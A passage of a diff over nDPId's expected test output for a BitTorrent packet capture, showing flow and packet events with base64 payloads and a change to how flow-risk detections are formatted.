AAAAAUEAAABXwAAAAUEAAAAaQAAAAUEAAAAmAAAAAUEAAACfAAAAAUEAAADWQAAAAUEAAABTAAAAAUEAAABBgAAAAUEAAABegAAAAUEAAAA1QAAAAUEAAAAxQAAAAUEAAAAvAAAAAUEAAAAnwAAAAUEAAAC6Q=="}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971675,"flow_last_seen":1455469971675,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469971675,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52902,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00558{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1455469971675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"ts_msec":1455469971675,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4IXFAAEAGAADAqAEDvmfDOM6mtimT1S+nN0acgIAY\/\/9DtgAAAQEIChncAUQAv2TsE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjkGjzZtimXS5YKE="}
-00741{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971675,"flow_last_seen":1455469971675,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469971675,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52902,"dst_port":46633,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
+00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971675,"flow_last_seen":1455469971675,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469971675,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52902,"dst_port":46633,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
 00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1455469972136,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"ts_msec":1455469972136,"pkt":"xCwDBkn+LFbcjDU0CABFAACrWLRAAHIGbE2+Z8M4wKgBA7YpzqY3RpyAk9Uv64AYAQLhNwAAAQEICgC\/ZvwZ3AFEE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLUJUNzk1MC3xopUl3euuGS1IpvoAAAEBFABkMTplaTBlNDppcHY0NDq+Z8M4NDppcHY2MTY6IAEAAF71efs4aCApQZg8xzE="}
 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1455469973108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"ts_msec":1455469973108,"pkt":"LFbcjDU0xCwDBkn+CABFAADJDUpAAEAGAADAqAEDvmfDOM6mtimT1TBDN0ac94AZ\/\/9EBwAAAQEIChncBtUAv2b8M2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTI6dXRfcmVjb21tZW5kaTVlMTA6dXRfY29tbWVudGk2ZWUxOnBpNDA5NTllNDpyZXFxaTI1NWUxOnYxOTrCtVRvcnJlbnQgTWFjIDEuOC42Njp5b3VyaXA0Or5nwzhlAAAAAQ8="}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974358,"flow_last_seen":1455469974358,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469974358,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52907,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00560{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1455469974358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"ts_msec":1455469974358,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4DCdAAEAGAADAqAEDUjrYc86rlaExvR02+FTOIoAY\/\/\/swwAAAQEIChncC64AhEXwE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjk6UZQGZj8psqfs="}
-00741{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974358,"flow_last_seen":1455469974358,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469974358,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52907,"dst_port":38305,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
+00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974358,"flow_last_seen":1455469974358,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469974358,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52907,"dst_port":38305,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974533,"flow_last_seen":1455469974533,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469974533,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52906,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00557{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1455469974533,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"ts_msec":1455469974533,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4WuVAAEAGAADAqAEDUjlhU86qz5GeFCpM34MiOYAY0pJ1ogAAAQEIChncDF0AFHySE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjjDhVI8cWXj55ew="}
-00739{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974533,"flow_last_seen":1455469974533,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469974533,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52906,"dst_port":53137,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
+00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974533,"flow_last_seen":1455469974533,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469974533,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52906,"dst_port":53137,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
 00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1455469974879,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"ts_msec":1455469974879,"pkt":"xCwDBkn+LFbcjDU0CABFAACrC6JAAHcGgnNSOWFTwKgBA8+RzqrfgyI5nhQqkIAYAQJ8JwAAAQEICgAUfLUZ3AxdE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wosdxOntFzioIvnoAAADnFABkMTplaTBlNDppcHY0NDpSOWFTMTI6Y29tcGxldGVfYWdvaTBlMTptZDExOnU="}
 01294{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1455469974888,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":586,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":586,"pkt_l4_len":552,"ts_msec":1455469974888,"pkt":"xCwDBkn+LFbcjDU0CABFAAI8C6RAAHcGgOBSOWFTwKgBA8+RzqrfgyKwnhQqkIAZAQKTPAAAAQEICgAUfLYZ3AxdcGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNTMxMzdlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTA2ZTY6eW91cmlwNDpSN80BZQAAAHQF\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/+\/\/\/\/\/\/\/\/\/r\/\/\/\/\/\/\/\/\/\/9\/\/P\/v\/\/\/\/\/+\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/ff\/\/\/3\/f\/\/\/\/\/\/\/\/\/\/7\/\/\/\/+\/\/\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/t\/u\/\/\/\/\/\/\/\/\/gAAAAAUEAAABGAAAAAUEAAACxAAAAAUEAAAAmwAAAAUEAAAB\/wAAAAUEAAABMwAAAAUEAAABJgAAAAUEAAABZAAAAAUEAAACOgAAAAUEAAAA1QAAAAUEAAACEAAAAAUEAAACFgAAAAUEAAADTAAAAAUEAAABWwAAAAUEAAACMAAAAAUEAAADPQAAAAUEAAADSQAAAAUEAAACnwAAAAUEAAAAeQAAAAUEAAAABgAAAAUEAAAA0wAAAAUEAAABJwAAAAUEAAACfwAAAAUEAAADVQAAAAUEAAADWQ=="}
 01449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1455469975129,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":705,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":705,"pkt_l4_len":671,"ts_msec":1455469975129,"pkt":"xCwDBkn+LFbcjDU0CABFAAKzM7RAAHUG4zdSOthzwKgBA5Whzqv4VM4iMb0deoAY\/SAeWQAAAQEICgCERjQZ3AuuE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3woo6KDyQqidsX6OsAAADnFABkMTplaTBlNDppcHY0NDpSOthzMTI6Y29tcGxldGVfYWdvaTFlMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGkzODMwNWU0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAzLjQuNTI6eXBpNTI5MDdlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/e\/\/\/\/\/9\/\/\/\/\/v\/\/2\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/7\/f\/+\/\/\/\/\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/7\/\/\/\/7+\/+\/\/\/+\/\/\/\/\/v\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/8\/\/\/\/\/\/\/f\/\/\/\/3\/\/\/\/\/\/\/\/+AAAAABQQAAAI1AAAABQQAAAEuAAAABQQAAABqAAAABQQAAAE\/AAAABQQAAABtAAAABQQAAAKkAAAABQQAAAElAAAABQQAAAL5AAAABQQAAANYAAAABQQAAAA2AAAABQQAAAIPAAAABQQAAAJBAAAABQQAAAAOAAAABQQAAAMMAAAABQQAAAJ5AAAABQQAAAF6AAAABQQAAAJZAAAABQQAAAATAAAABQQAAAM4AAAABQQAAAItAAAABQQAAAHdAAAABQQAAAEPAAAABQQAAAMNAAAABQQAAABX"}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975234,"flow_last_seen":1455469975234,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469975234,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52911,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00557{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1455469975234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"ts_msec":1455469975234,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4WJNAAEAGAADAqAEDlxpfHs6vWJEERbWJ8qKonIAYJJ+4TgAAAQEIChncDxURKgrLE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjhul1XASmRgFxRA="}
-00740{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975234,"flow_last_seen":1455469975234,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469975234,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52911,"dst_port":22673,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
+00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975234,"flow_last_seen":1455469975234,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469975234,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52911,"dst_port":22673,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975240,"flow_last_seen":1455469975240,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469975240,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.72.255.163","src_port":52912,"dst_port":59928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00560{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1455469975240,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"ts_msec":1455469975240,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4VgZAAEAGAADAqAEDl0j\/o86w6hjbuZSz\/XvqFoAYKEhZAgAAAQEIChncDxoAaM\/9E0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjpHIptJ+s3GSLpo="}
-00742{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975240,"flow_last_seen":1455469975240,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469975240,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.72.255.163","src_port":52912,"dst_port":59928,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
+00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975240,"flow_last_seen":1455469975240,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469975240,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.72.255.163","src_port":52912,"dst_port":59928,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975265,"flow_last_seen":1455469975265,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469975265,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52909,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00558{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1455469975265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"ts_msec":1455469975265,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4dKFAAEAGAADAqAEDTzXkAs6tOSO1PcfcBOlxsoAYN4r1TQAAAQEIChncDzIAAH\/nE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjpuHBUmeY0dBAis="}
-00739{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975265,"flow_last_seen":1455469975265,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469975265,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52909,"dst_port":14627,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
+00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975265,"flow_last_seen":1455469975265,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469975265,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52909,"dst_port":14627,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
 00589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1455469975295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":157,"pkt_l4_len":123,"ts_msec":1455469975295,"pkt":"xCwDBkn+LFbcjDU0CABFAACPKABAAHIGh9GXSP+jwKgBA+oYzrD9e+oW27mU94AYAQF3EQAAAQEICgBo0AMZ3A8aE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wopW+kcQUcjSA5QoAAADnFABkMTplaTBlNDppcHY0NDqXSA=="}
 00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1455469975314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"ts_msec":1455469975314,"pkt":"xCwDBkn+LFbcjDU0CABFAACdCeVAAHIGRpKXGl8ewKgBA1iRzq\/yoqicBEW1zYAYHVwArAAAAQEIChEqCxYZ3A8VE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC2coV7lk33H8ZRraqcAAADnFABkMTplaTBlNDppcHY0NDqXGl8eMTI6Y29tcGxldGVf"}
 00984{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1455469975341,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":449,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":449,"pkt_l4_len":415,"ts_msec":1455469975341,"pkt":"LFbcjDU0xCwDBkn+CABFAAGz+chAAEAGAADAqAEDUjrYc86rlaExvR16+FTQoYAY\/\/\/t\/gAAAQEIChncD3wAhEZHAAAA+hQAZDE6ZWkwZTQ6aXB2NDQ6UjfNATQ6aXB2NjE2Ov6AAAAAAAAAxiwD\/\/4GSf4xMjpjb21wbGV0ZV9hZ29pMWUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTI6dXRfcmVjb21tZW5kaTVlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGk0MDk1OWU0OnJlcXFpMjU1ZTE6djE5OsK1VG9ycmVudCBNYWMgMS44LjY2OnlvdXJpcDQ6UjrYc2UAAAABDwAAAAMJn\/8AAAADFAMAAAAAAQIAAABlFAZkODptc2dfdHlwZWkwZTM6bnVtaTIwZTY6ZmlsdGVyNjQ6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGU="}
@@ -64,72 +64,72 @@
